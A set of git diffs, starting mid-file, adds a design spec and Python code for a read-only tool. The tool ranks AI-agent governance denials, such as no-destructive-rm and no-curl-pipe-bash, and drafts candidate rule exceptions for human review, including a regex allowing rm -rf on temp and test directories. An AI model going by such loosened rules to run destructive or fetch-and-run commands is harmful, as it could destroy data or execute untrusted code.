+                    └─────────────────────────────────────┘
+```
+
+Analysis is **read-only** — it never writes to the chain, never proposes actions to drivers, never auto-PRs. Outputs are reports a human reviews. This matches the chitin-v2 architectural rule: Go kernel owns side effects; analysis is on the read side.
+
+---
+
+## Architecture: chain-canonical / projection (mirrors F4)
+
+The analysis layer follows the same shape as F4's OTEL emit:
+
+| Layer | Role | Format |
+|---|---|---|
+| Source of truth | gov-decisions JSONL (chain audit log) | append-only |
+| Canonical analysis output | JSON (`out/<stream>-<date>.json`) | structured, regenerable |
+| Projection | Markdown (`out/<stream>-<date>.md`) | human read |
+
+Just as OTEL spans are non-authoritative projections of the chain, **markdown reports are non-authoritative projections of the analysis JSON**. JSON is the contract; markdown is for reading.
+
+---
+
+## Goals (in scope, v1)
+
+1. Python package `python/analysis/` with a clean foundation: loaders, types, writers, common detection primitives.
+2. Decisions stream — full implementation: load JSONL → detect patterns → draft candidate rules → emit JSON + markdown.
+3. Layer 1 (deterministic) is the demo path. Zero network dependencies. Output is a pure function of input JSONL.
+4. Layer 2 (LLM-drafted rules via `--llm-draft`) is opt-in, falls back to heuristic on failure.
+5. Talk-day artifact: ranked top-N pattern catalog + candidate rule drafts for the headline patterns.
+6. Stub modules for debt and soul-routing streams that import the foundation but return empty results — proves the foundation is shape-correct.
+
+## Non-goals (separate work)
+
+- Auto-PR generation. Humans apply drafts.
+- Dashboard / web UI. JSON + markdown only in v1.
+- Cross-stream correlation (e.g., "this decision pattern co-occurs with this debt finding"). v2.
+- Live streaming / file-watcher mode. CLI-on-demand only.
+- Schema migration tooling for the JSONL audit log.
+- Inclusion of `flow_events.jsonl` (older swarm format, 105k events). Defer; the gov-decisions log is the canonical chitin source.
+
+---
+
+## Invariants (state the claims, then prove with code)
+
+- **I1.** Given N decisions in window W, output is a ranked list of `(rule_id, action_type, agent_id)` tuples, sorted by count descending with **stable tie-breaker** alphabetic on `rule_id` → `action_type` → `agent_id`. Two runs over the same input produce byte-identical JSON.
+- **I2.** Every run produces both `out/<stream>-<date>.json` (canonical) and `out/<stream>-<date>.md` (projection). The markdown is regenerable from the JSON alone — no input dependency.
+- **I3.** Layer 1 (deterministic detection + heuristic templates) has zero network dependencies. Pure function of JSONL input.
+- **I4.** With `--llm-draft` off (default), output is byte-identical given identical input *and identical `generated_at` clock*. The CLI accepts `--now <iso8601>` to fix the clock for tests; production runs stamp wall-clock.
+- **I5.** A bad JSONL line never aborts a run. Parse errors are logged (count surfaced in `input_summary.parse_errors`) and the run continues. Audit-log integrity is the chain's job, not analysis's.
+
+## Boundaries (Knuth: name them before the code)
+
+- Empty input (0 decisions in window) → empty `patterns: []`, valid JSON, exit 0.
+- Single decision → one pattern, count=1, draft attempted if template exists.
+- All decisions same `(rule_id, action_type, agent_id)` → one pattern, count=N, ranked alone.
+- Tied counts → tie-breaker invoked; never relies on dict iteration order.
+- Decision with `rule_id: null` (allow-by-default, no rule fired) → bucket separately under `<none>`, do not mix with denies.
+- Decision with `agent: null` or missing → use literal `"<unknown>"`, count it.
+- Decision with malformed `ts` → skipped, counted in `input_summary.parse_errors`.
+- Window boundary: `ts >= since AND ts < until`. Half-open. The boundary case (a decision at exactly `until`) belongs to the next window.
+
+---
+
+## Layout
+
+```
+python/analysis/
+├── __init__.py
+├── pyproject.toml         # uv-managed; depends only on stdlib + pyyaml
+├── types.py               # Decision, Pattern, RuleDraft, Finding (dataclasses)
+├── loaders.py             # load_gov_decisions(dir, window) → list[Decision]
+├── detect.py              # detect_patterns(decisions) → list[Pattern]
+├── draft.py               # draft_rule(pattern) → RuleDraft (heuristic dispatch)
+├── llm_draft.py           # [Layer 2] enrich_with_llm(drafts) → list[RuleDraft]
+├── writers.py             # write_json(...), write_markdown(...)
+├── decisions.py           # main entry: python -m analysis.decisions
+├── debt.py                # [stub] decisions-foundation reuser
+├── souls.py               # [stub] decisions-foundation reuser
+├── templates/             # one heuristic per rule_id family
+│   ├── __init__.py        # registry + lookup
+│   ├── no_destructive_rm.py
+│   ├── bounds_max_files_changed.py
+│   ├── no_curl_pipe_bash.py
+│   └── no_force_push.py
+└── tests/
+    ├── test_loaders.py
+    ├── test_detect.py
+    ├── test_draft.py
+    ├── test_writers.py
+    └── fixtures/
+        └── gov-decisions-fixture.jsonl
+```
+
+---
+
+## CLI
+
+```bash
+python -m analysis.decisions \
+  --window 7d \
+  --top-n 10 \
+  --out-dir out/ \
+  [--llm-draft] \
+  [--decisions-dir $HOME/.chitin]
+```
+
+**Defaults:**
+- `--window 7d`
+- `--top-n 10`
+- `--out-dir python/analysis/out/` (gitignored)
+- `--decisions-dir $HOME/.chitin`
+- `--llm-draft` off
+
+**Exit codes:**
+- 0 — success (including empty-window)
+- 2 — input dir doesn't exist
+- 3 — write failure on output
+
+---
+
+## JSON schema (canonical)
+
+```json
+{
+  "schema_version": "1",
+  "stream": "decisions",
+  "generated_at": "2026-04-30T12:34:56Z",
+  "window": {
+    "days": 7,
+    "since": "2026-04-23T00:00:00Z",
+    "until": "2026-04-30T12:34:56Z"
+  },
+  "input_summary": {
+    "files_read": 6,
+    "total_decisions": 1225,
+    "allows": 1163,
+    "denies": 62,
+    "parse_errors": 0,
+    "distinct_rule_ids": 14
+  },
+  "patterns": [
+    {
+      "rank": 1,
+      "rule_id": "no-destructive-rm",
+      "action_type": "shell.exec",
+      "agent_id": "copilot-cli",
+      "count": 19,
+      "first_seen": "2026-04-23T...",
+      "last_seen": "2026-04-30T...",
+      "decision_class": "deny",
+      "sample_envelope_ids": ["...", "...", "..."],   // first 3 envelope_ids for human spot-check; not the full set
+      "draft": {
+        "kind": "heuristic",
+        "template": "no_destructive_rm",
+        "confidence": "medium",
+        "rule_yaml": "rules:\n  - id: no-destructive-rm-test-dirs\n    ...",
+        "predicted_impact": {
+          "samples_evaluated": 19,                     // ALL decisions in this pattern (= count above), not the 3 in sample_envelope_ids
+          "would_allow": 12,
+          "would_still_deny": 7,
+          "method": "regex-match-on-action_target"
+        },
+        "notes": "..."
+      }
+    }
+  ],
+  "no_template_patterns": [
+    {
+      "rule_id": "envelope-exhausted",
+      "action_type": "...",
+      "agent_id": "...",
+      "count": 2,
+      "reason_no_template": "envelope-exhausted is a structural finding, not a rule-shape pattern"
+    }
+  ]
+}
+```
+
+**Notes on schema:**
+- `decision_class` is `"deny"` or `"allow"`. v1 ranks denies; allows are summarized in `input_summary` only.
+- `predicted_impact.method` makes the heuristic self-describing — markdown can show it.
+- `no_template_patterns` exists so the report doesn't lie by omission. If a pattern is high-count but we have no draft template, it still appears in the output, with `reason_no_template`.
+
+---
+
+## Markdown projection (sketch)
+
+```markdown
+# Decisions Analysis — 2026-04-30
+
+**Window:** 7d (2026-04-23 → 2026-04-30)
+**Input:** 1225 decisions (1163 allowed, 62 denied), 14 distinct rule_ids
+
+## Top patterns
+
+### #1 — no-destructive-rm × shell.exec × copilot-cli (19 denies)
+
+First seen: 2026-04-23. Last seen: 2026-04-30.
+
+**Candidate rule (heuristic, medium confidence):**
+
+```yaml
+rules:
+  - id: no-destructive-rm-test-dirs
+    when:
+      action_type: shell.exec
+      action_target: /^(rm|find).*-(rf|delete).*\/(tmp|test|out|graphify-out)/
+    decide: allow
+    reason: "cleanup of known-temp dirs"
+```
+
+**Predicted impact:** 12 of 19 sampled denials would become allows (regex-match-on-action_target). 7 still deny.
+
+[Sample envelopes: env_abc123, env_def456, env_ghi789]
+
+---
+
+### #2 — ...
+```
+
+---
+
+## Detection algorithm (Layer 1)
+
+Trivially simple, deliberately so:
+
+```python
+def detect_patterns(decisions: list[Decision]) -> list[Pattern]:
+    # Group by (rule_id, action_type, agent_id)
+    buckets: dict[tuple, list[Decision]] = {}
+    for d in decisions:
+        if d.allowed:  # v1 ranks denies only
+            continue
+        key = (d.rule_id or "<none>", d.action_type or "<none>", d.agent or "<unknown>")
+        buckets.setdefault(key, []).append(d)
+
+    # Sort: count desc, then stable tie-breaker
+    keys_sorted = sorted(
+        buckets.keys(),
+        key=lambda k: (-len(buckets[k]), k[0], k[1], k[2]),
+    )
+    return [Pattern.from_bucket(k, buckets[k], rank=i+1)
+            for i, k in enumerate(keys_sorted)]
+```
+
+That's the whole detection engine. The honest name `detect_patterns` matches: it is exactly group-and-rank, no clustering, no anomaly detection, no ML. The complexity lives in the templates, not the engine.
+
+---
+
+## Templates (Layer 1: heuristic rule drafting)
+
+Each template is a function `(pattern) -> RuleDraft | None`. Returns `None` if it doesn't know how to draft for this pattern. The `templates/__init__.py` registry maps `rule_id` → template function.
+
+**v1 templates (prioritized by observed deny counts):**
+
+| rule_id | template | strategy |
+|---|---|---|
+| `no-destructive-rm` (30 denies) | `no_destructive_rm.py` | regex-match `action_target` for known-safe dirs (test/, tmp/, out/) → propose `allow`-on-match exception |
+| `bounds:max_files_changed` (3 denies) | `bounds_max_files_changed.py` | doc-batch detection: if all-changed paths share a common prefix in `docs/`, propose context-aware ceiling |
+| `no-curl-pipe-bash` (3 denies) | `no_curl_pipe_bash.py` | extract URL host; if host in known-trusted list, propose host-allow exception |
+| `no-force-push` (2 denies) | `no_force_push.py` | branch detection: propose allow on personal/feature branches, keep deny on main |
+
+Patterns without a template appear in `no_template_patterns` — honest about analyzer limits, not silent.
+
+**Predicted impact** is computed by running the proposed rule against the sample decisions. The `method` field describes how (`regex-match-on-action_target`, `path-prefix-match`, etc.). If the method is non-deterministic, the template returns `None` and the pattern goes to `no_template_patterns`.
+
+---
+
+## Layer 2 — LLM-drafted rules (opt-in)
+
+When `--llm-draft` is set:
+
+1. For each pattern in the top-N, build a prompt: the pattern, its sample decisions, the current `chitin.yaml` rules section.
+2. Call local LLM via ollama (qwen3-coder).
+3. LLM returns YAML rule + impact prediction in a structured format.
+4. On any failure (LLM down, parse error, timeout) → fall back to heuristic template, mark `kind: "heuristic-fallback"`.
+
+**Demo strategy:** Layer 2 is **off** during the talk. The talk demonstrates Layer 1, which is fully deterministic. Layer 2 ships in v1 but is positioned as upside, not load-bearing.
+
+---
+
+## Failure handling
+
+- Bad JSONL line → log to stderr, increment `input_summary.parse_errors`, continue.
+- Output dir doesn't exist → create it.
+- Output write fails → exit 3 with stderr explanation. JSON is written before markdown so partial state is "JSON exists, markdown missing" — never reverse.
+- LLM call fails (Layer 2) → heuristic fallback per pattern, log to stderr, continue.
+- Decision with malformed `ts` → skip, count in parse errors. Don't fail the run.
+- Decision with missing `rule_id` for a deny → `<none>` bucket. We surface "the gate denied without a rule_id" as its own finding — that's a chitin debt signal in itself.
+
+---
+
+## Talk-day demo path (2026-05-07)
+
+```bash
+$ cd ~/workspace/chitin
+$ python -m analysis.decisions --window 7d
+✓ Loaded 1225 decisions from $HOME/.chitin/ (6 files, 0 parse errors)
+✓ Detected 10 deny patterns across 9 rule_ids
+✓ Drafted 4 candidate rules (heuristic), 6 patterns lack templates
+✓ Wrote python/analysis/out/decisions-2026-05-07.json
+✓ Wrote python/analysis/out/decisions-2026-05-07.md
+
+Top finding:
+  rule_id=no-destructive-rm × shell.exec × copilot-cli — 19 denies
+  → draft adds normalize() exempting test-dir cleanup
+  → predicted: 12 allows, 7 still deny
+  → see out/decisions-2026-05-07.md for the rule diff
+```
+
+The demo opens the markdown in an editor, shows the rule diff, applies it as a PR. **Closed loop, end to end, in two minutes.**
+
+---
+
+## Foundation extraction (the "C lean")
+
+Although v1 is deep on decisions, the package layout is structured so debt and soul-routing can plug in as ~1-day additions:
+
+- `loaders.py` — generic JSONL window loader; gov-decisions is the first caller, debt is the second (loads from `metrics.jsonl` and event chain), souls is the third.
+- `types.py` — `Finding` is the abstract over `Pattern`. Debt findings are `Finding`s with a different shape; markdown writer dispatches on `stream` field.
+- `writers.py` — `write_json` / `write_markdown` operate on `Finding` lists, not Pattern-specific.
+- `detect.py` — the group-and-rank primitive is pulled into `_groupby_count_with_tiebreak()` so debt and souls reuse it.
+
+The stubs `debt.py` and `souls.py` import the foundation, return empty findings, and write valid empty JSON/markdown. This proves the foundation generalizes before v2 is implemented.
+
+---
+
+## Implementation plan (preview)
+
+The plan doc will be written separately via `/superpowers writing-plans`. Tasks (preview):
+
+1. Survey: confirm top deny rule_ids on latest data (already done — see this spec).
+2. Scaffold `python/analysis/` (pyproject, init, types, fixtures).
+3. Loaders: parse gov-decisions JSONL with window filtering.
+4. Detection engine: group-and-rank with tie-breaker. Tests for boundaries (empty / single / all-same / tied).
+5. Templates: 4 heuristics for the observed top denies. Each gets its own test file.
+6. Writers: JSON canonical + markdown projection. Determinism test (run twice, byte-equal).
+7. CLI entry: `python -m analysis.decisions` + arg parsing + exit codes.
+8. Stubs: `debt.py` + `souls.py` writing valid empty findings — proves foundation generalizes.
+9. Layer 2: LLM-drafted rules with fallback path. Off by default.
+10. End-to-end run on real `$HOME/.chitin/gov-decisions-*.jsonl` — verify talk-day output.
+11. Talk-day rehearsal: clean run, screenshot of the markdown, dry-run of the demo.
+
+---
+
+## Out of scope, capture for later
+
+- **Cross-stream findings** (decision pattern correlated with debt finding correlated with soul outcome) — v2 has the full closed loop.
+- **Auto-PR generation** — once Layer 1 produces drafts the human trusts, automation can apply them. Not v1.
+- **Streaming / live mode** — interesting for the dashboard; not needed for talk demo.
+- **Schema migration of gov-decisions JSONL** — orthogonal; if the audit-log schema evolves, loaders adapt.
+- **`flow_events.jsonl` ingestion** — older swarm format, 105k events; not chitin-native. Defer.
+- **Multi-agent comparison reports** — soul-routing stream's territory.
+
+---
+
+## Spec self-review
+
+- ✓ Invariants stated as one-sentence claims, code shape preserves them.
+- ✓ Boundaries named: empty / single / all-same / tied / null fields / window edges.
+- ✓ Tie-breaker is fully specified (alphabetic primary → secondary → tertiary).
+- ✓ JSON is canonical; markdown is regenerable; demo path is deterministic.
+- ✓ Real survey data drives template priority — no guessing.
+- ✓ Failure modes are explicit; bad data never aborts a run.
+- ✓ "C lean" is enforced by stubs that prove foundation generalizes.
+- ✓ Forcing function (talk) shapes scope — Layer 1 is the demo path; Layer 2 is upside.
+- ✓ Read-only side: no kernel writes, no auto-PR, no chain emission.
+
+Open question for review:
+- **Q.** Should v1 also rank *allows* (not just denies) so we surface "rule X allowed Y times for tool Z by agent W" as candidate-tighten patterns? Tightening is the dual of loosening. **Suggested answer:** v1 ranks denies only (the loosen direction is the immediate talk story). v2 adds allows ranking under the soul-routing stream where "agent A always allowed for tool T" is a soul-fit signal.

--- a/python/analysis/__init__.py
+++ b/python/analysis/__init__.py
@@ -1,0 +1,2 @@
+"""chitin analysis layer — decisions, debt, soul-routing streams."""
+__version__ = "0.1.0"

--- a/python/analysis/__main__.py
+++ b/python/analysis/__main__.py
@@ -1,0 +1,5 @@
+"""`python -m analysis` — guide users to the right submodule."""
+import sys
+
+print("Use: python -m analysis.decisions", file=sys.stderr)
+sys.exit(2)

--- a/python/analysis/debt.py
+++ b/python/analysis/debt.py
@@ -39,9 +39,10 @@ def main(argv: list[str] | None = None) -> int:
     write_json(json_path, findings=[], no_template=[],
                input_summary={"total_decisions": 0, "denies": 0, "allows": 0,
                               "files_read": 0, "parse_errors": 0,
-                              "distinct_rule_ids": 0},
+                              "distinct_rule_ids": 0,
+                              "decisions_missing_envelope_id": 0},
                generated_at=now, window_since=now, window_until=now,
-               window_days=7)
+               window_size="7d")
     body = _json.loads(json_path.read_text())
     body["stream"] = "debt"
     json_path.write_text(_json.dumps(body, indent=2, sort_keys=True) + "\n")

--- a/python/analysis/debt.py
+++ b/python/analysis/debt.py
@@ -1,0 +1,57 @@
+"""Debt stream stub. Foundation-generalization proof — produces valid empty
+findings via the same writers as decisions.py.
+
+v1: empty patterns, valid JSON/markdown. Plug in real detection in v2.
+"""
+from __future__ import annotations
+
+import argparse
+import json as _json
+import sys
+from datetime import datetime, timezone
+from pathlib import Path
+
+from analysis.writers import write_json
+
+
+def parse_args(argv: list[str] | None = None) -> argparse.Namespace:
+    p = argparse.ArgumentParser(prog="analysis.debt")
+    p.add_argument("--out-dir", default="python/analysis/out")
+    p.add_argument("--now", default=None)
+    return p.parse_args(argv)
+
+
+def main(argv: list[str] | None = None) -> int:
+    args = parse_args(argv)
+    if args.now:
+        now = datetime.fromisoformat(args.now)
+        if now.tzinfo is None:
+            now = now.replace(tzinfo=timezone.utc)
+    else:
+        now = datetime.now(tz=timezone.utc)
+
+    out_dir = Path(args.out_dir)
+    out_dir.mkdir(parents=True, exist_ok=True)
+    date_str = now.date().isoformat()
+    json_path = out_dir / f"debt-{date_str}.json"
+    md_path = out_dir / f"debt-{date_str}.md"
+
+    write_json(json_path, findings=[], no_template=[],
+               input_summary={"total_decisions": 0, "denies": 0, "allows": 0,
+                              "files_read": 0, "parse_errors": 0,
+                              "distinct_rule_ids": 0},
+               generated_at=now, window_since=now, window_until=now,
+               window_days=7)
+    body = _json.loads(json_path.read_text())
+    body["stream"] = "debt"
+    json_path.write_text(_json.dumps(body, indent=2, sort_keys=True) + "\n")
+
+    md_path.write_text(
+        "# Debt Analysis — " + date_str + "\n\n"
+        "_Stub stream. Real detection ships in v2._\n"
+    )
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())

--- a/python/analysis/debt.py
+++ b/python/analysis/debt.py
@@ -6,7 +6,6 @@ v1: empty patterns, valid JSON/markdown. Plug in real detection in v2.
 from __future__ import annotations
 
 import argparse
-import json as _json
 import sys
 from datetime import datetime, timezone
 from pathlib import Path
@@ -42,10 +41,7 @@ def main(argv: list[str] | None = None) -> int:
                               "distinct_rule_ids": 0,
                               "decisions_missing_envelope_id": 0},
                generated_at=now, window_since=now, window_until=now,
-               window_size="7d")
-    body = _json.loads(json_path.read_text())
-    body["stream"] = "debt"
-    json_path.write_text(_json.dumps(body, indent=2, sort_keys=True) + "\n")
+               window_size="7d", stream="debt")
 
     md_path.write_text(
         "# Debt Analysis — " + date_str + "\n\n"

--- a/python/analysis/decisions.py
+++ b/python/analysis/decisions.py
@@ -100,6 +100,7 @@ def main(argv: list[str] | None = None) -> int:
     distinct_rule_ids = len(Counter(d.rule_id for d in decisions))
     denies = sum(1 for d in decisions if not d.allowed)
     allows = len(decisions) - denies
+    missing_envelope_id = sum(1 for d in decisions if not d.envelope_id)
     summary = {
         "total_decisions": len(decisions),
         "denies": denies,
@@ -107,6 +108,7 @@ def main(argv: list[str] | None = None) -> int:
         "files_read": load_result.files_read,
         "parse_errors": load_result.parse_errors,
         "distinct_rule_ids": distinct_rule_ids,
+        "decisions_missing_envelope_id": missing_envelope_id,
     }
 
     date_str = now.date().isoformat()
@@ -117,7 +119,7 @@ def main(argv: list[str] | None = None) -> int:
         write_json(json_path, findings=findings, no_template=no_template,
                    input_summary=summary, generated_at=now,
                    window_since=window.since, window_until=window.until,
-                   window_days=int((window.until - window.since).total_seconds() // 86400) or 1)
+                   window_size=args.window)
         write_markdown_from_json(json_path, md_path)
     except OSError as e:
         print(f"Error writing output: {e}", file=sys.stderr)

--- a/python/analysis/decisions.py
+++ b/python/analysis/decisions.py
@@ -88,6 +88,15 @@ def main(argv: list[str] | None = None) -> int:
             "reason_no_template": "below top-N cutoff",
         })
 
+    if args.llm_draft and findings:
+        from analysis.llm_draft import enrich_with_llm
+        pairs = [(f.pattern, f.draft) for f in findings]
+        enriched = enrich_with_llm(pairs)
+        findings = [
+            build_finding(f.pattern, new_draft, rank=f.rank)
+            for f, new_draft in zip(findings, enriched)
+        ]
+
     distinct_rule_ids = len(Counter(d.rule_id for d in decisions))
     denies = sum(1 for d in decisions if not d.allowed)
     allows = len(decisions) - denies

--- a/python/analysis/decisions.py
+++ b/python/analysis/decisions.py
@@ -1,0 +1,131 @@
+"""CLI entry: python -m analysis.decisions ..."""
+from __future__ import annotations
+
+import argparse
+import os
+import sys
+from collections import Counter
+from datetime import datetime, timezone
+from pathlib import Path
+
+from analysis.detect import detect_patterns
+from analysis.draft import draft_for_pattern, reason_no_template
+from analysis.loaders import load_gov_decisions, parse_window_str
+from analysis.writers import build_finding, write_json, write_markdown_from_json
+import analysis.templates.all  # noqa: F401  (registers all templates)
+
+
+def parse_args(argv: list[str] | None = None) -> argparse.Namespace:
+    p = argparse.ArgumentParser(prog="analysis.decisions",
+                                description="Rank deny patterns and draft candidate rules.")
+    p.add_argument("--window", default="7d", help="Window: e.g., 7d, 24h, 60m")
+    p.add_argument("--top-n", type=int, default=10, help="Top N patterns to keep")
+    p.add_argument("--out-dir", default="python/analysis/out",
+                   help="Output directory")
+    p.add_argument("--decisions-dir",
+                   default=os.environ.get("HOME", "/") + "/.chitin",
+                   help="Directory containing gov-decisions-*.jsonl")
+    p.add_argument("--now", default=None,
+                   help="ISO-8601 to fix the clock (deterministic tests)")
+    p.add_argument("--llm-draft", action="store_true",
+                   help="Enable Layer 2 LLM-drafted rules (opt-in)")
+    return p.parse_args(argv)
+
+
+def main(argv: list[str] | None = None) -> int:
+    args = parse_args(argv)
+
+    if args.now:
+        now = datetime.fromisoformat(args.now)
+        if now.tzinfo is None:
+            now = now.replace(tzinfo=timezone.utc)
+    else:
+        now = datetime.now(tz=timezone.utc)
+
+    decisions_dir = Path(args.decisions_dir)
+    if not decisions_dir.exists():
+        print(f"Error: decisions-dir does not exist: {decisions_dir}", file=sys.stderr)
+        return 2
+
+    out_dir = Path(args.out_dir)
+    out_dir.mkdir(parents=True, exist_ok=True)
+
+    window = parse_window_str(args.window, now)
+    print(f"Loading decisions from {decisions_dir} (window: {args.window})...",
+          file=sys.stderr)
+    load_result = load_gov_decisions(decisions_dir, window)
+    decisions = load_result.decisions
+    print(f"  Loaded {len(decisions)} decisions from {load_result.files_read} files "
+          f"({load_result.parse_errors} parse errors).", file=sys.stderr)
+
+    patterns = detect_patterns(decisions)
+    top = patterns[: args.top_n]
+    rest = patterns[args.top_n:]
+    print(f"Detected {len(patterns)} deny patterns; keeping top {len(top)}.",
+          file=sys.stderr)
+
+    findings = []
+    no_template = []
+    for i, p in enumerate(top, start=1):
+        d = draft_for_pattern(p)
+        if d is None:
+            no_template.append({
+                "rule_id": p.rule_id,
+                "action_type": p.action_type,
+                "agent_id": p.agent_id,
+                "count": p.count,
+                "reason_no_template": reason_no_template(p),
+            })
+        else:
+            findings.append(build_finding(p, d, rank=i))
+
+    for p in rest:
+        no_template.append({
+            "rule_id": p.rule_id,
+            "action_type": p.action_type,
+            "agent_id": p.agent_id,
+            "count": p.count,
+            "reason_no_template": "below top-N cutoff",
+        })
+
+    distinct_rule_ids = len(Counter(d.rule_id for d in decisions))
+    denies = sum(1 for d in decisions if not d.allowed)
+    allows = len(decisions) - denies
+    summary = {
+        "total_decisions": len(decisions),
+        "denies": denies,
+        "allows": allows,
+        "files_read": load_result.files_read,
+        "parse_errors": load_result.parse_errors,
+        "distinct_rule_ids": distinct_rule_ids,
+    }
+
+    date_str = now.date().isoformat()
+    json_path = out_dir / f"decisions-{date_str}.json"
+    md_path = out_dir / f"decisions-{date_str}.md"
+
+    try:
+        write_json(json_path, findings=findings, no_template=no_template,
+                   input_summary=summary, generated_at=now,
+                   window_since=window.since, window_until=window.until,
+                   window_days=int((window.until - window.since).total_seconds() // 86400) or 1)
+        write_markdown_from_json(json_path, md_path)
+    except OSError as e:
+        print(f"Error writing output: {e}", file=sys.stderr)
+        return 3
+
+    print(f"Wrote {json_path}", file=sys.stderr)
+    print(f"Wrote {md_path}", file=sys.stderr)
+    if findings:
+        top1 = findings[0]
+        print(f"\nTop finding: {top1.pattern.rule_id} × {top1.pattern.action_type} "
+              f"× {top1.pattern.agent_id} — {top1.pattern.count} denies", file=sys.stderr)
+        if top1.draft:
+            imp = top1.draft.predicted_impact
+            print(f"  → predicted: {imp.would_allow} allows, "
+                  f"{imp.would_still_deny} still deny", file=sys.stderr)
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())

--- a/python/analysis/detect.py
+++ b/python/analysis/detect.py
@@ -1,0 +1,53 @@
+"""Pattern detection: group decisions by (rule_id, action_type, agent), rank."""
+from __future__ import annotations
+
+from collections import defaultdict
+from typing import Iterable
+
+from analysis.types import Decision, Pattern
+
+
+def detect_patterns(decisions: Iterable[Decision]) -> list[Pattern]:
+    """Group denies by (rule_id, action_type, agent_id), rank by count desc.
+
+    Invariants:
+      - Allows are skipped (v1 ranks denies only).
+      - Tie-breaker: count desc → alphabetic on rule_id → action_type → agent_id.
+        Two runs over identical input produce identical output (I1).
+      - Null/missing fields bucket as '<none>' / '<unknown>'.
+    """
+    buckets: dict[tuple[str, str, str], list[Decision]] = defaultdict(list)
+    for d in decisions:
+        if d.allowed:
+            continue
+        key = (
+            d.rule_id or "<none>",
+            d.action_type or "<none>",
+            d.agent or "<unknown>",
+        )
+        buckets[key].append(d)
+
+    keys_sorted = sorted(
+        buckets.keys(),
+        key=lambda k: (-len(buckets[k]), k[0], k[1], k[2]),
+    )
+
+    patterns: list[Pattern] = []
+    for key in keys_sorted:
+        bucket = buckets[key]
+        bucket_sorted = sorted(bucket, key=lambda d: (d.ts, d.envelope_id or ""))
+        sample_ids = tuple(
+            d.envelope_id for d in bucket_sorted[:3] if d.envelope_id
+        )
+        patterns.append(Pattern(
+            rule_id=key[0],
+            action_type=key[1],
+            agent_id=key[2],
+            count=len(bucket),
+            first_seen=bucket_sorted[0].ts,
+            last_seen=bucket_sorted[-1].ts,
+            decision_class="deny",
+            sample_envelope_ids=sample_ids,
+            decisions=tuple(bucket_sorted),
+        ))
+    return patterns

--- a/python/analysis/draft.py
+++ b/python/analysis/draft.py
@@ -1,0 +1,26 @@
+"""Dispatch a Pattern to its template, returning a RuleDraft or None."""
+from __future__ import annotations
+
+from typing import Optional
+
+from analysis.templates import REGISTRY
+from analysis.types import Pattern, RuleDraft
+
+
+def draft_for_pattern(pattern: Pattern) -> Optional[RuleDraft]:
+    """Look up a template by rule_id and produce a draft.
+
+    Returns None if no template is registered for this rule_id, OR if the
+    template returns None (heuristic declined this specific pattern).
+    """
+    fn = REGISTRY.get(pattern.rule_id)
+    if fn is None:
+        return None
+    return fn(pattern)
+
+
+def reason_no_template(pattern: Pattern) -> str:
+    """Human-readable explanation for why no draft was generated."""
+    if pattern.rule_id not in REGISTRY:
+        return f"no template registered for rule_id={pattern.rule_id!r}"
+    return f"template for {pattern.rule_id!r} declined this pattern"

--- a/python/analysis/llm_draft.py
+++ b/python/analysis/llm_draft.py
@@ -9,7 +9,7 @@ import json
 import urllib.request
 from typing import Iterable, Optional
 
-from analysis.types import Pattern, RuleDraft
+from analysis.types import Pattern, PredictedImpact, RuleDraft
 
 OLLAMA_URL = "http://localhost:11434/api/generate"
 OLLAMA_MODEL = "qwen3-coder"
@@ -70,12 +70,18 @@ def enrich_with_llm(
             response = _call_ollama(prompt)
             if not response.strip():
                 raise RuntimeError("empty LLM response")
+            inherited = PredictedImpact(
+                samples_evaluated=heuristic.predicted_impact.samples_evaluated,
+                would_allow=heuristic.predicted_impact.would_allow,
+                would_still_deny=heuristic.predicted_impact.would_still_deny,
+                method=f"{heuristic.predicted_impact.method} (inherited; LLM yaml not re-evaluated)",
+            )
             out.append(RuleDraft(
                 kind="llm",
                 template=heuristic.template,
                 confidence="medium",
                 rule_yaml=response.strip() + "\n",
-                predicted_impact=heuristic.predicted_impact,
+                predicted_impact=inherited,
                 notes=f"LLM-enriched (ollama {OLLAMA_MODEL}). Heuristic was: {heuristic.template}",
             ))
         except Exception as e:

--- a/python/analysis/llm_draft.py
+++ b/python/analysis/llm_draft.py
@@ -1,0 +1,90 @@
+"""Layer 2 — LLM-drafted rules via local ollama. Opt-in, fail-safe.
+
+Any failure (network, parse, timeout) falls back to the heuristic draft, marked
+kind='heuristic-fallback'. The LLM is never load-bearing for the demo.
+"""
+from __future__ import annotations
+
+import json
+import urllib.request
+from typing import Iterable, Optional
+
+from analysis.types import Pattern, RuleDraft
+
+OLLAMA_URL = "http://localhost:11434/api/generate"
+OLLAMA_MODEL = "qwen3-coder"
+TIMEOUT_SECONDS = 30.0
+
+
+def _build_prompt(pattern: Pattern, heuristic: RuleDraft) -> str:
+    samples = "\n".join(
+        f"  - {d.action_target!r} (envelope {d.envelope_id})"
+        for d in pattern.decisions[:5]
+    )
+    return (
+        f"You are drafting a chitin governance rule. Return ONLY YAML, no prose.\n"
+        f"\n"
+        f"Observed pattern: rule_id={pattern.rule_id}, "
+        f"action_type={pattern.action_type}, agent={pattern.agent_id}, "
+        f"count={pattern.count}.\n"
+        f"\n"
+        f"Sample denied actions:\n{samples}\n"
+        f"\n"
+        f"Heuristic draft (improve on this if you can):\n"
+        f"{heuristic.rule_yaml}\n"
+        f"\n"
+        f"Reply with a single YAML block proposing a refinement. Be conservative."
+    )
+
+
+def _call_ollama(prompt: str) -> str:
+    req = urllib.request.Request(
+        OLLAMA_URL,
+        data=json.dumps({
+            "model": OLLAMA_MODEL,
+            "prompt": prompt,
+            "stream": False,
+        }).encode("utf-8"),
+        headers={"Content-Type": "application/json"},
+    )
+    with urllib.request.urlopen(req, timeout=TIMEOUT_SECONDS) as resp:
+        body = json.loads(resp.read().decode("utf-8"))
+    return body.get("response", "")
+
+
+def enrich_with_llm(
+    pairs: Iterable[tuple[Pattern, Optional[RuleDraft]]],
+) -> list[RuleDraft]:
+    """For each (pattern, heuristic_draft) pair, attempt LLM enrichment.
+
+    Pairs with None heuristic are skipped. Pairs with a heuristic always
+    produce a draft — either kind='llm' on success or kind='heuristic-fallback'
+    on any failure.
+    """
+    out: list[RuleDraft] = []
+    for pattern, heuristic in pairs:
+        if heuristic is None:
+            continue
+        try:
+            prompt = _build_prompt(pattern, heuristic)
+            response = _call_ollama(prompt)
+            if not response.strip():
+                raise RuntimeError("empty LLM response")
+            out.append(RuleDraft(
+                kind="llm",
+                template=heuristic.template,
+                confidence="medium",
+                rule_yaml=response.strip() + "\n",
+                predicted_impact=heuristic.predicted_impact,
